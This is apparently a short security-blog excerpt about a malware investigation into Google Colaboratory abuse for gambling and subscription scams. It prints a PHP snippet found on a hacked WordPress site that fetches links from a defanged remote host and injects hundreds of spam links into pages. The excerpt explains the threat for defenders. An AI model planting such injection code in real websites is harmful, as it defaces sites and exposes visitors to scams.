Global CyberSecurity

Massive Google Colaboratory Abuse: Gambling and Subscription Scam

0

Published on 07/18/2023 – Last Updated on 07/19/2023 by OTC

This investigation started with a small and quite simple piece of PHP malware found on a hacked website. We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file:

<?php

$lines = file(‘https://4ip[.]su/db/links.txt’); 

shuffle($lines);

$data = array_rand($lines, 900); 

echo ‘<p>’;

foreach($data as $value) {

$rand = substr(md5(microtime()),rand(0,26),6);

echo ‘<a href=”‘.$lines[$value].'”>’.$rand.'</a> ‘;

};

echo ‘</p>’;

?>

This script fetches a list of links from a remote location (hxxps://4ip[.]su/db/links.txt) and then injects some of them into a web page.

Continue reading Massive Google Colaboratory Abuse: Gambling and Subscription Scam at .

Découvrez les véhicules blindés 14 juillet 2023 – A Detailed Look combat vehicles French army parade

Previous article

Land Forces Commander General Baugnée Priorities for Belgian Army Belgique parade militaire 2023

Next article

You may also like

Comments

Comments are closed.